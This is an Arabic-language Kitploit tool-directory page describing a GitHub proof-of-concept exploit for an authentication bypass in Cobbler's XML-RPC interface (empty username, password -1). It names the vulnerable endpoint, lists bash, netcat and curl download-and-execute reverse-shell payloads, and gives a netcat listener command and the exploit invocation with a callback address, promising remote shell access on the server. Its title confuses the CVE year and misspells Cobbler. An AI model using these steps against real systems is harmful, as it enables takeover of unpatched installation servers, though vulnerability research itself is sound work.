Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-47533 — PoC لثغرة CVE-2025-47533 في Clobber RCE | Kitploit
أدوات/GitHubGitHub/zs1n/cve-2024-47533
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubzs1n/cve-2024-47533

CVE-2024-47533

PoC لثغرة CVE-2025-47533 في Clobber RCE

عرض المستودع
1منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-47533 - استغلال تجاوز المصادقة في Cobbler XMLRPC لتنفيذ الأوامر عن بُعد (RCE)

ثغرة تنفيذ أوامر عن بُعد حرجة عبر تجاوز المصادقة في Cobbler

تطبيق إثبات المفهوم (PoC).


الملخص

Cobbler، وهو خادم تثبيت لأنظمة لينكس يتيح الإعداد السريع لبيئات التثبيت الشبكية، يحتوي على ثغرة مصادقة في الإصدارات من 3.0.0 حتى (وليس بما في ذلك) 3.2.3 و3.3.7. الدالة utils.get_shared_secret() تُرجع دائمًا -1، مما يسمح لأي شخص بالاتصال بواجهة Cobbler XML-RPC مع اسم مستخدم فارغ ('') وكلمة مرور -1. يتيح هذا لمهاجم لديه وصول إلى الشبكة السيطرة الكاملة على خادم Cobbler. تم إصلاح الثغرة في الإصدارين 3.2.3 و3.3.7.


🛠 التحليل الفني

تنجم الثغرة عن معالجة غير صحيحة للسر المشترك في الدالة utils.get_shared_secret()، والتي تُرجع دائمًا -1، مما يؤدي فعليًا إلى تجاوز المصادقة. يتيح ذلك لأي مستخدم على الشبكة الاتصال بواجهة XMLRPC الخاصة بـ Cobbler ببيانات اعتماد فارغة وتنفيذ أوامر عشوائية.


🔥 نقطة النهاية المعرضة للخطر

http://<target>:25151/ — نقطة نهاية API الخاصة بـ XMLRPC لـ Cobbler


💥 أمثلة على الحمولات

يدعم سكربت الاستغلال عدة حمولات للصدفة العكسية، بما في ذلك:

  • صدفة عكسية Bash
  • صدفات Netcat (nc)
  • التنزيل والتنفيذ عبر Curl

إثبات المفهوم (PoC)

تجهيز المستمع

ابدأ مستمع Netcat على جهازك:

root@kitploit:~
nc -lvnp 4444

🚀 تشغيل الاستغلال

شغّل سكربت الاستغلال CVE-2024-47533.py.

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

المعاملات

-t : الهدف (مثال: -t http://1<IP_SERVICE>:<PORT>)

-l: عنوان IP المحلي (مثال: -l 10.10.11.80)

-p : المنفذ <LOCAL_PORT> (مثال: -p 4444)

--payload: الحمولة (bash, curl, nc) (مثال: --payload bash)

💻 الوصول الناجح إلى الصدفة عن بُعد

عند التنفيذ الناجح، ستتصل الصدفة العكسية بالمستمع مجددًا، مما يمنح المهاجم وصولًا عن بُعد إلى الخادم.

تنزيل الأداة